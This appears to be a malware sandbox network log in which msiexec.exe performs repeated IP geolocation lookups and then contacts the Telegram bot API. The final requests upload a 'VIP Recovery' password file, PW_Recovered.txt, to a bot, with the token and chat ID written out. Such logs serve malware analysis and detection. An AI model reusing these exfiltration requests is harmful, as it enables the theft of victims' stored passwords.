2025-01-10 16:17:32 UTC	851	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840641 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=39k3drqy4Xf8lPa4U3%2B4mmUEsdhlPPnxhsy23O2VIhfXzq08wD0cQJWATCIOHC1aufYGpDchzymXCTgbYBtgmO1iPxikRC5yRWzz28JEDa7NrEn45nf48cwVOnHMeVFrLrkTgaYM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdfa527d187d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1963&rtt_var=756&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1429270&cwnd=244&unsent_bytes=0&cid=973ebe4ce392d80b&ts=171&x=0"
2025-01-10 16:17:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	59374	104.21.80.1	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:17:33 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 16:17:33 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840642 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7tfioflMkDgVlFo%2Bo8yh%2FdjMV%2FIQxGflVr9IPg2zinCvRxfIdir%2FJuraLsFDT6wK4Du2LMTNkkIPjM4ywUWhXZIot11jojs9p170ZjNvfpeVDSGWycFmLUNjCmubl%2BReRKedVeTL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdfa584f8442d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1639&rtt_var=648&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1781574&cwnd=229&unsent_bytes=0&cid=e8bab479b806af71&ts=149&x=0"
2025-01-10 16:17:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	59376	104.21.80.1	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:17:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 16:17:35 UTC	865	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840644 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RV3cgc39KMLbN%2BLpEKT8XdIak5%2BD6oFntGYWheILCc%2BMFVdcaUF%2F%2FdLH0c%2FKHDktP23dzNxjK3eOOB%2FE42l8xl8X2PFpGDyRjKmkukOXZIJVBjxXD5JfUtpm%2BNFUfQYLvA8a4bRG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdfa617885c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1571&rtt_var=613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1750599&cwnd=244&unsent_bytes=0&cid=b006fdbc6a1359d6&ts=173&x=0"
2025-01-10 16:17:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	59378	104.21.80.1	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:17:36 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 16:17:36 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:36 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840645 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tiK2FDbTAuci5ec56IGz7wP9QUC4F2RyFK51f%2BPOTWREQMKOh04tIwRvCm5N9BYNWkA%2BbUEmqUWaJy9DtYcIJShozhsghAtt0gmre%2F9Nis9hn%2B3VsF14CKPyw7djJ46KnmZKpiO%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdfa6b184c42d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1572&rtt_var=606&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1781574&cwnd=229&unsent_bytes=0&cid=d8861ab330db1de4&ts=204&x=0"
2025-01-10 16:17:36 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	59380	104.21.80.1	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:17:38 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 16:17:38 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840647 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SjQ21azwRgomDXkihh2k6TPzaCjiaVk1leoA%2B3odTmRVUBmkyaYAij07WCxW%2Bjq%2BZfDTjz3v1KMQa6q18Jysv2dvXkrE914Kk5TTh8JJ%2BP0d%2BbOHxVH23N%2BGYdjgKaqGfhnJazef"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdfa76c8bb42d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1571&rtt_var=620&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1723730&cwnd=229&unsent_bytes=0&cid=0eb6c44cdf20644d&ts=149&x=0"
2025-01-10 16:17:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	59382	104.21.80.1	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:17:39 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 16:17:40 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840649 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E5JYLWnGij4tKyrLcfAzSZPLDa0QJl7AHQGJy1iM6%2FeZEaGCGFJpa0UvyeYStsbImji%2FHYEieCiz9kLBMjYnU6zayDH9SSTnVczZTi%2BFOB2T5wnDcmDlxzW4hMSGUAWFkgxBDOS%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdfa80cdb942d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1571&rtt_var=607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1776155&cwnd=229&unsent_bytes=0&cid=749beb2c203e9c2f&ts=149&x=0"
2025-01-10 16:17:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	59384	104.21.80.1	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:17:41 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 16:17:41 UTC	853	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840650 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=as%2F0GqKjeOClcH6tcKEqTtXxGQTPdNC7sdLmfVOebXqzmCuRdBlF7AqHGN3lsVrdEsSWN6IzOzSY1Kw6p7eT6OMktQse6l2qI%2Bum9UbJ9bMDT2vnEV2cM4aaEn6iwIwooQUZ7l6X"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdfa89ddd18c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2114&min_rtt=2060&rtt_var=811&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1417475&cwnd=223&unsent_bytes=0&cid=753a258e98c0f9f4&ts=152&x=0"
2025-01-10 16:17:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	59386	104.21.80.1	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:17:42 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 16:17:42 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:42 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840652 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P1j3TrvjJDp5sjumM87NoQsQ7dR%2F79gbJbNH7ncck4i%2BVPm58p7IBrGnFmymWpHPmi4%2BSeMX2XpaGyHCVXxEHiogtw7QNW3SdqQnyY2ZsbOVx6Hc5Rk%2BPbwgTtBb8KY9GOypOiF6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdfa92fb8c8c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1923&rtt_var=732&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1484494&cwnd=223&unsent_bytes=0&cid=63b28eb94f30f1bd&ts=160&x=0"
2025-01-10 16:17:42 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	59388	104.21.80.1	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:17:44 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 16:17:44 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:44 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840653 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wql9n9Eb6np2hC8HWFGQ6EHj5Lbb5otcYzBhbjjsCGziPn76AVUyj4%2BR9MLCukEbIF32VP2PXwpRHvZftnf8nH3EXzIXeKCy75KXFlIUj9ZxCQ%2FOrjkTB3XyjJvoUqUR%2FF61PVdE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdfa9d3a3542d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1559&rtt_var=609&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1762220&cwnd=229&unsent_bytes=0&cid=516d9e798e8820d3&ts=159&x=0"
2025-01-10 16:17:44 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	59389	149.154.167.220	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:17:45 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-10 16:17:45 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 16:17:45 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 16:17:45 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	59390	149.154.167.220	443	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:17:52 UTC	352	OUT	POST /bot7888983233:AAGHDGX41oFk6oqVx8IC3EbSn56Cf9Te8YI/sendDocument?chat_id=8150022612&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd32380b8cca17 Host: api.telegram.org Content-Length: 585
2025-01-10 16:17:52 UTC	585	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 33 38 30 62 38 63 63 61 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 33 39 30 31 32 30 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 